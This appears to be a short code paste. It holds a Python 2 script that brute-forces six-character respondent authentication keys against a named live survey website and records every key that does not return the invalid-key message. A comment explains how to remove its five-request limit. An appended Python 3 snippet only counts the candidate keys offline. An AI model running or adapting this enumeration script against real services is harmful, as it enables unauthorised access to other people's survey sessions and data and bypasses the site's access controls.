Python Crawler for Sites.
rlunde, Sep 6th, 2016 (edited)
import urllib2  # Python 2 standard library.
import itertools

sKey = "The respondent authentication key"  # This text appears on every page returned for an invalid key.
mainURL = "https://or.allegiancetech.de/cgi-bin/qwebcorporate.dll?idx=EUFMZ4&l=dansk&rk="  # URL to Lodam GPW.
outList = []  # Output list of functioning keys.
keyElements = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"  # Characters a key may contain.
subsets = itertools.combinations_with_replacement(keyElements, 6)  # Lazily generate 6-character candidates from the characters above.
# WARNING: Generates about 4.5 million combinations (C(41, 6) = 4,496,388) to test, proceed with caution.
iterMax = 0  # Test protection.
for i in subsets:
    identifier = ''.join(i)  # Join the elements of each subset into one string.
    iterMax = iterMax + 1
    if iterMax > 5:  # Safety valve: comment out this check to remove it.
        break
    response = urllib2.urlopen(mainURL + identifier)  # Call urllib2 and open the web page.
    html = response.read()  # Read the response body.
    if sKey not in html:  # Check whether the sKey error text is missing from the HTML.
        outList.append(identifier)  # If it is missing, save the identifier, as it is valid.
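
The size of the candidate set in the WARNING comment can be checked offline, without making any requests. The sketch below is written for Python 3.8+ (it relies on math.comb), unlike the Python 2 script above, and the names KEY_ELEMENTS, KEY_LENGTH, count_sorted_combinations, count_all_strings and first_candidates are hypothetical helpers introduced here for illustration. It assumes the same 36-character alphabet and key length of 6. Note that combinations_with_replacement only yields tuples whose characters follow the order of the alphabet string, so it covers far fewer strings than itertools.product would.

```python
import itertools
import math

# Same alphabet and key length as the script above (assumed unchanged).
KEY_ELEMENTS = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
KEY_LENGTH = 6


def count_sorted_combinations(n_symbols, length):
    """Number of tuples itertools.combinations_with_replacement yields."""
    return math.comb(n_symbols + length - 1, length)


def count_all_strings(n_symbols, length):
    """Number of tuples itertools.product(..., repeat=length) yields."""
    return n_symbols ** length


def first_candidates(limit):
    """Return the first `limit` joined candidates without generating the rest."""
    subsets = itertools.combinations_with_replacement(KEY_ELEMENTS, KEY_LENGTH)
    # islice stops the lazy generator after `limit` items, like the safety valve.
    return ["".join(s) for s in itertools.islice(subsets, limit)]


print(count_sorted_combinations(len(KEY_ELEMENTS), KEY_LENGTH))  # 4496388
print(count_all_strings(len(KEY_ELEMENTS), KEY_LENGTH))          # 2176782336
print(first_candidates(5))
```

Using itertools.islice here plays the same role as the iterMax counter: it caps how many candidates are ever produced, so the full set is never materialised.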